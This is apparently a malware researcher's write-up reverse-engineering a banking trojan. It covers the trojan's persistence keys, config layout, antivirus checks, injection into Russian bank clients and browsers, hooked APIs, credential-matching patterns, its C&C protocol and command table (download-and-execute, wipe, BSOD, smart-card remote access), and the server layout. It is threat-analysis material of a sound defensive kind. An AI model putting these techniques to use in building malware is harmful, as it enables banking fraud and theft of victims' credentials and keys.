[General View]
Before you start reading my notes about this malware,read another articles:
Ok,now let's look at the bot's pe image.It hasn't import,most strings are encrypted.
After some reversing I understood calling api format for that malware,look at this picture:
Every time when bot wants call the api,he gets pointer on api-table buffer(at the picture that pointer is in register eax) and chooses desirable function by index(at picture this is 0x13c)
To make analyze better I've made this api-table:
http://pastebin.com/g0MXyTnr
Also here are my ida-python script for decrypting strings:
http://pastebin.com/F5MSe6BD
[Malware Installing]
Installation in the system is very trivial.
First of all, malware tries drop itself in two possible ways:
- in system directory (GetSystemDirectory)
- in temp directory (GetTempPath)
Dropped filenames hardcoded in my sample:
- ifkf_mfLEnWa_g.exe
- BlvyLYGJKTTLK_gTzE.exe
All new files get original file time kernel32.dll.
Here are autorun registry keys, that bot uses:
- Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
- Software\Microsoft\Windows\CurrentVersion\Run
- SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run (x64)
Name of registry key, which bot uses for autorunning:
LmihNjzSczsUOFeQZJkVKCBFoz
Also in registry,malware stores main config:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Key name
SysDebug32
Config encrypted by the same algorithm, which used for decrypting stringsBelow you can see the structure of the config:
config total size ==0x312
BotConfig
Offset
|
Field name
|
0x0
|
char* host_url (C&C url)
|
0x64
|
char* botID (see below description)
|
0x96
|
bool block_bank_client_Work_1 (checked in java injection code)
|
0x97
|
bool block_bank_client_Work_2 (checked in java injection code)
|
0x98
|
bool block_bank_client_Work_3 (checked in java injection code)
|
0x99
|
bool block_bank_client_Work_4 (checked in cbmain.ex injection code)
|
0x9D
|
bool block_bank_client_Work_5 (checked in wclnt.exe,ip-client.exe,rclient.exe injection code)
|
0x9F
|
bool block_bank_client_Work_6 (checked in tiny.exe injection code)
|
0xAE
|
??
|
0xB2
|
??
|
0xBA
|
bool ProxyMode
|
0xBB
|
DWORD netAddr (proxy backconnect address)
|
0xBF
|
WORD port (proxy backconnect port)
|
0xC1
|
DWORD send_net_reques (if set to 1,bot send Net_Request)
|
0xC5
|
??
|
0xC9
|
DWORD rand
|
0xCD
|
DWORD rand
|
0xD1
|
struct FILETIME (Bot up time GetSystemTime->SystemTimeToFileTime)
|
0xD9
|
??
|
0xDB
|
??
|
0x1A1
|
??
|
0x30E
|
DWORD hash_config (used for checking integrity config)
|
[AVdetecting]
Bot enumerates processes and searches av vendors software:
Kaspersky
ESET
AVG
Avira
Avast
Norton Antivirus
McAfee
Panda Antivurus
Comodo
DrWeb
After this check he sends request to C&C, with request type
AV_check (see below description).
Bot afraid of Kaspersky,so if he find his active process,he doesn't install in the system.
Also in him exists funny-useless code to killing ESET gui process (egui.exe).
In that code,he just trying open process with
PROCESS_TERMINATE access,and terminate..So this is fucking disaster!
[InjectionCode]
Mechanism of injection in malware - it's just CreateRemoteThread.
Bot injects main payload code to another processes:
- on x86 systems it is svchost.exe
- on x64 systems it is explorer.exe (it creates process of explorer and injects)
Bot has hardcoded table, which consits of hash of the process name and code injection function.
In that sample which I have, some process names in table haven't injection code..Probably it's customizing during building bot.
Here I've gathered information about all processes, which I've found in the table below:
Table of process names used in malware for injection code
Company(Software)Name
|
Url
|
Image name
|
Injection Code
|
BSS DBO Bank-Client |
http://www.bssys.com/en/ |
cbmain.ex |
yes |
Western Union |
http://www.westernunion.com |
translink.exe |
yes |
SberBank Bank-Client |
http://www.sbrf.ru/en/ |
wclnt.exe |
yes |
KazKom bank cilent |
http://en.kkb.kz/ |
rclient.exe |
yes |
WebMoney Transfer |
http://www.wmtransfer.com/ |
webmoney.exe |
yes |
Contact Money transfer system |
http://www.contact-sys.com/eng/index.phtml |
contactNG.exe |
yes |
CBS scrooge |
http://eng.lime-systems.com/ |
tiny.exe |
yes |
Unisteam Money Transfer |
http://intl.unistream.com |
UniStream.exe |
yes |
Baltic Bank client |
http://www.baltbank.ru/bc/ |
BBClient.exe |
yes |
Mozilla Firefox |
http://www.mozilla.org/en-US/ |
firefox.exe |
yes |
Opera |
http://www.opera.com/ |
opera.exe |
yes |
Safari Browser |
http://support.apple.com/kb/DL1531 |
safari.exe |
yes |
Microsoft |
http://windows.microsoft.com |
iexplore.exe |
yes |
Oracle |
http://www.oracle.com/index.html |
java.exe,javaw.exe |
yes |
Putty SSH and telnet client |
http://www.putty.org |
putty.exe |
yes |
IntrustBank client |
http://www.intrustbank.ru/ |
clntw32.exe |
no |
Bank client |
http://www.rpb.ru/doc/doku.php?id=goststart |
intpro.exe |
no |
Credit bank of Moscow |
http://english.mkb.ru/ |
bc_loader.exe |
no |
B24 bank client |
http://www.bank24.ru/ |
iscc.exe |
no |
Inbank bank client |
https://inbank.org/ |
inbank-start-ff.exe |
no |
UralSib bank client |
http://www.bankuralsib.ru/index.wbp |
kb_cli.exe,kb_cli.ex |
no |
Unknown bank client |
-/- |
bankcl.exe |
no |
Unknown bank client |
-/- |
bk.exe |
no |
Microsoft |
http://windows.microsoft.com |
ntvdm.exe |
no |
Unknown bank client |
-/- |
startclient7.exe |
no |
Chelyabinsk bank client |
http://www.chelinvest.ru/ |
el_cli.ex |
no |
Unknown bank client |
-/- |
clbank.exe |
no |
Unknown bank client |
-/- |
oncbcli.exe |
no |
Unknown bank client |
-/- |
clmain.exe |
no |
RegionBank client |
http://www.nomos-regiobank.ru/ |
elbank.exe |
no |
BiKript bank client |
http://www.s3bank.ru/corp/client-bank/index.phtml/ |
ISClient.exe |
no |
SGB bank client |
http://www.severgazbank.ru/ |
sgbclient.exe |
no |
MFbank client |
http://www.mfbank.ru/index.php |
loadmain.exe |
no |
Unknown |
-/- |
selva_copy.exe |
no |
Unknown bank client |
-/- |
client7.exe |
no |
Unknown bank client |
-/- |
bclient.exe |
no |
Bank+ client |
http://cbs.inversion.ru/ |
cbsmain.exe |
no |
Here are examples of payload for some processes:
Firefox,Iexplore,Opera,Safari payload
Delete all .ibank* file in systemroot/system32/java/ and %USERPOFILE% directory
Hook functions:
wininet.dll
HttpSendRequestW
HttpSendRequestA
HttpSendRequestExA
InternetWriteFile
Firefox specific hook
NSPR4.dll
PR_write
In the handler of hooked function, it monitors access to online-banks by template.
Here are pattern strings, which it uses:
https:\/\/ibank.prbb.ru
https:\/\/ibank.alfabank.ru
auth-attr-\d+-param1=.*&auth-attr-\d+-param2=.*
\/servlets\/mbo
\/servlets\/ibc
/bsi.dll
username=.*&password=.*
wclnt.exe,rclient.exe,ipclient.exe process payload
Hook function:
kernel32.dll
CreateFile
In the handler of the hooked function, it captures and sends on C&C key files(see below
Send_key_file_request):
sign.key,master.key,UZ.DB3,GK.DB3
In general, injected payload looks similar,and most of them based on searching windows,taking screenshots,grabbing information from windows.Here are a table of searched windows(some of them written in Russian):
Searched windows table
Window Class
|
Window Caption
|
SunAwtDialog |
Вход в систему,Синхронизация с Банком |
SunAwtFrame |
Вход в систему,Welcome |
javax.swing.JFrame |
Вход в систему,Welcome |
MSAWT_Comp_Class |
Вход в систему,Welcome |
PuTTY |
-/- |
TLoginWindow |
Логин |
TGetOper |
Вход в систему |
ThunderRT6FormDC |
Western Union Translink |
TfAuthNew |
Tiny Client-Bank |
WebMoney Keeper Classic |
Идентификация пользователя |
UNIStreamR. Аутентификация. |
-/- |
[NetworkActivity]
I identified three main parts of network for this bot:
-Sending information and geting tasks from C&C ,by http get-post requests.
-Binding port,for accepting incoming connections,
to enable remote access to smart-card.
-Supporting reverse (backconnect) proxy SOCKS5
Bot uses traffic encryption by custom base64 algorithm with that alphabet
:
"qBPTD5ZQcnLOjobYMd6JSEU1Ifv89G4RsXwe3yaKmFCAipurl0/t2VzxN+7khgHW="
So it is pretty easy to decrypt traffic with tool like this:
http://www.kahusecurity.com/2011/custom-base64-decoder/
Typical bot's request looks like:
------------------------------------------------------------------------------------
POST /releases/index.php HTTP/1.1
Content-Type: multipart/form-data, boundary=7DD02020A0D0000
User-Agent: gsa-crawler
Host: ___.__
Content-Length: 226
Connection: Keep-Alive
Cache-Control: no-cache
--7DD02020A0D0000
Content-Disposition: form-data; name="q"
vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==
--7DD02020A0D0000
Content-Disposition: form-data; name="data"; filename="new_file"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
J3gS6SffbwB1fUno8z+y46+y4ZS=
--7DD02020A0D0000--
------------------------------------------------------------------------------------
Okay,lets parse this:
Blue color : static value
Green color: boundary,generated by GetSystemTime with format string
%02X%02X%02X%02X%02X%04X
Purple color : random useragent,see below all possible values from table.
Orange color: header of request message,so here are example how it looks decrypted
id=0x16-779d52d376_33e2e8df_eb1735e7&session=2458654464&v=16779010&name=keno&mj=5&mi=1&pt=1&b=2600&dc=32
format string:
id=%s&session=%u&v=%u&name=%s&mj=%u&mi=%u&pt=%u&b=%u&dc=%u
id=BotId,generated by host name,and two magic dwords,calc by the main encryption algoritm (part of key table generation),but with using another
alphabet:
STORAGE_DEVICE_DESCRIPTOR serial number and product id in first round
IP_ADAPTER_INFO.address in second round
session=random value
v= bot version number (constant value)
name=bot build name (constant string)
mj=MajorVersion Windows
mi=MinorVersion Windows
pt=ProductType Windows
b=BuildNumber Windows
dc=processor arch model (x86/x64)
Aqua color: request type,see below type table
Red color: this is data of request
User agent table
Firefly/1.0 (compatible; Mozilla 4.0; MSIE 5.5)
FlashGet
Flexum/2.0
FreshDownload/x.xx
FavIconizer
DeepIndex
gsa-crawler
ContentSmartz
Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) TrueRobot; 1.5
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)
Mozilla/5.0 (compatible; TridentSpider/3.1)
NationalDirectoryAddURL/1.0
NETCOMplete/x.xx
Nocilla/1.0
OliverPerry
OpenTextSiteCrawler/2.9.2
Opera/8.xx (Windows NT 5.1; U; en)
Opera/9.00 (Windows NT 5.1; U; de)
PHP/4.0.6
PHP/4.1.2
Popdexter/1.0
PureSight
RAYSPIDER/Nutch-0.9
Scooter-3.2.EX
SearchdayBot
ShablastBot 1.0
SiteXpert
TeamSoft WinInet Component
Toutatis x.x-x
URLBase/6.x
WebCorp/1.0
Y!J-SRD/1.0
Yeti
Zend_Http_Client
Request Type table
Request type name
|
Request Parameters
|
Additional Description
|
AV_check
|
&av=%d
|
Send request about working av soft
|
Check_token
|
&token=0 (token not exist)
&token=1 (token exist)
|
|
Send_key_file_request
|
&cb=1
|
Send bank client key file
|
Excep_request
|
&exception
|
Send when in bot occurred unhandled exception.
|
Alr_load_request
|
&lr=1
|
Send when failed create mutex,detecting already running bot.
|
SendFile_Request
|
&file=1 (File not found)
&file=2 (send file in cab file)
|
|
Comm_compl_request
|
&cmd=1
|
Send when command get from C&C completed.
|
Load_execute_request
|
&load=1 (Success)
&load=2 (failed)
|
|
Net_Request
|
&net=1
|
Send bot network information
|
Key_request
|
&keys=1
|
Send when found .jks key
|
Screen_request
|
&screen=1
|
Send when make screenshot,(in cab file screenshot)
|
Notify_request
|
&t=%d (random)
|
Send when injected in process (in data of request NOTIFY:%processname%)
|
Bot asks C&C for the tasks in the loop by sending requests.
Here are how typical task request from C&C and answer look like:
Below is the structure of a response from the C&C
Task Message:
DWORD count_param
DWORD command
BYTE data []
Command table
Command
|
Description
|
0x2
|
Bot SelfUpdate
|
0x3
|
Enable blocking bank client (set to true state block_bank_client_Work_1,block_bank_client_Work_2 in config)
|
0x4
|
Disable blocking bank client (set to false state block_bank_client_Work_1,block_bank_client_Work_2 in config)
|
0x5
|
Enable blocking bank client (set to true state block_bank_client_Work_3 in config)
|
0x6
|
Disable blocking bank client (set to true state block_bank_client_Work_3 in config)
|
0x7
|
Enable Proxy Mode (set ProxyMode to true state,set netAddr and port in config)
|
0x8
|
Disable Proxy Mode (set ProxyMode to false state in config)
|
0x9
|
Get list of file from all volume (if data[] ==NULL),or search file (mask filename in data[]),SendFile_Request
|
0x0A
|
Download file from url (get in data[]) by get request,and execute them.Send Load_execute request.
|
0x0C
|
Search key file(search mask *.jks ),send Key_request.
|
0x0D
|
Kill OS(delete file *.*,make BSOD like in 0x11 command)
|
0x0E
|
Bot Self deleting
|
0x0F
|
Send bot network information (Net_Request)
|
0x10
|
Reboot System
|
0x11
|
BSOD system (inject in csrss thread,in injected thread make exception)
|
0x12
|
Set to 1 value in offset 0xC5 (unknown)
|
0x13
|
Set to 0 value in offset 0xC5 (unknown)
|
0x14
|
Update C&C url address in config (field host_url)
|
0x15
|
Enable blocking bank client (set to true state block_bank_client_Work_4 in config)
|
0x16
|
Disable blocking bank client (set to false state block_bank_client_Work_4 in config)
|
0x19
|
Enable blocking bank client (set to true state block_bank_client_work_5 in config)
|
0x1B
|
Load and laucnh module.
|
0x1C
|
Make Screenshot,send Screen_request
|
0x20
|
Disable blocking bank client (set to false state block_bank_client_work_5 in config)
|
If in task cycle C&C not responds bot can update config to use second url C&C.
As I said
,bot binds port(0x165a) for supporting remote control of smart-card.
In simplified manner, commands give ability to use these api:
0x0 SCardStatusA
0x1 SCardGetStatusChangeA
0x2 SCardDisconnect
0x3 SCardControl
0x4 SCardEstablishContext
0x5 SCardListReadersA
0x6 SCardConnectA
0x7 SCardBeginTransaction
0x8 SCardEndTransaction
0x9 SCardTransmit
0xa SCardGetAttrib
Some additional information about C&C struct directory(not all of course):
/releases
avs.php
base64.php
commands.php
config.php
stat.php
getrc.php
/inc
jabber.php
thumbnail.php
/modules
/default
/32
/64
/other
/_screenshots
/1004 (example)
/_files
[Conclusion]
I still haven't described a lot in this bot,reverse proxy protocol,java patching and etc. Maybe I forgot something,or another shit.
But finally,my target was just show you a paradox:
bots with simple architecture still working effectively and still steal money.
Thanks for reading ^_^
---------------------------
Cause and effect.